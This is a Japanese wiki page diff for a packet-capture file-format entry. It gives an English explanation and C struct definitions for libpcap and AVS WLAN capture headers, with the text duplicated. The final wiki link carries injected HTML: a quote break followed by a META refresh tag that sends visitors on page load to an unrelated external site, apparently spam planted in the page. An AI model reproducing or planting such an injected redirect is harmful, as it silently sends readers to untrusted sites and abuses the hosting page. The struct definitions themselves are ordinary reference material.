ファイルフォーマット - パケットキャプチャー

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ファイルフォーマット - パケットキャプチャー」(2007/12/09 (日) 22:17:26) の最新版変更点



Firefly's raw capture tool for RAlink cards saves the result in LibPCap format. You can either look at these files using Ethereal or write a loader. Towards that end, here is C code defining the structures. Fixme: add links to other descriptions of libpcap, etc... // This may vary depending on your compiler. The idea is to force // structure alignment to byte boundaries. #pragma pack(push) #pragma pack(1) typedef struct sPCapHeader { uint32 magicNumber; // magic number uint16 version[2]; // version number int32 timeZone; // difference between capture time zone and GMT uint32 stampAccuracy; // accuracy of timestamps uint32 maxRecordLength; // max length of captured packets (bytes) uint32 networkType; // network link type } tPCapHeader; // Used to tell the endianess of the PCap data const uint32 PCapMagic = 0xA1B2C3D4; const uint32 PCapMagicReversed = 0xD4C3B2A1; typedef struct sPCapRecord { uint32 timeSecs; // timestamp (seconds) uint32 timeUSecs; // timestamp (microseconds) uint32 recordedLength; // number of bytes of packet saved in file uint32 originalLength; // actual length of packet } tPCapRecord; // Used to tell the endianess of the AVS data // WARNING: this can be different to the PCap endianess!!! const uint32 AVS_REVISION = 0x80211001; typedef struct sAVSWLanHeader { uint32 revision; uint32 length; uint8 timestamp[8]; uint8 hostTime[8]; uint32 phyType; uint32 channel; uint32 dataRate; uint32 antenna; uint32 priority; uint32 ssiType; uint32 ssiSignal; uint32 ssiNoise; uint32 preamble; uint32 encoding; } tAVSWLanHeader; // This may vary depending on your compiler. The idea is to return // structure alignment to whatever is optimal for the platform. #pragma pack(pop) ----
Firefly&#039;s raw capture tool for RAlink cards saves the result in LibPCap format. You can either look at these files using Ethereal or write a loader. Towards that end, here is C code defining the structures. Fixme: add links to other descriptions of libpcap, etc... // This may vary depending on your compiler. The idea is to force // structure alignment to byte boundaries. #pragma pack(push) #pragma pack(1) typedef struct sPCapHeader { uint32 magicNumber; // magic number uint16 version[2]; // version number int32 timeZone; // difference between capture time zone and GMT uint32 stampAccuracy; // accuracy of timestamps uint32 maxRecordLength; // max length of captured packets (bytes) uint32 networkType; // network link type } tPCapHeader; // Used to tell the endianess of the PCap data const uint32 PCapMagic = 0xA1B2C3D4; const uint32 PCapMagicReversed = 0xD4C3B2A1; typedef struct sPCapRecord { uint32 timeSecs; // timestamp (seconds) uint32 timeUSecs; // timestamp (microseconds) uint32 recordedLength; // number of bytes of packet saved in file uint32 originalLength; // actual length of packet } tPCapRecord; // Used to tell the endianess of the AVS data // WARNING: this can be different to the PCap endianess!!! const uint32 AVS_REVISION = 0x80211001; typedef struct sAVSWLanHeader { uint32 revision; uint32 length; uint8 timestamp[8]; uint8 hostTime[8]; uint32 phyType; uint32 channel; uint32 dataRate; uint32 antenna; uint32 priority; uint32 ssiType; uint32 ssiSignal; uint32 ssiNoise; uint32 preamble; uint32 encoding; } tAVSWLanHeader; // This may vary depending on your compiler. The idea is to return // structure alignment to whatever is optimal for the platform. #pragma pack(pop) ---- [[@wikiへ>http://kam.jp"><META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://esthe.pink.sh/r/]]




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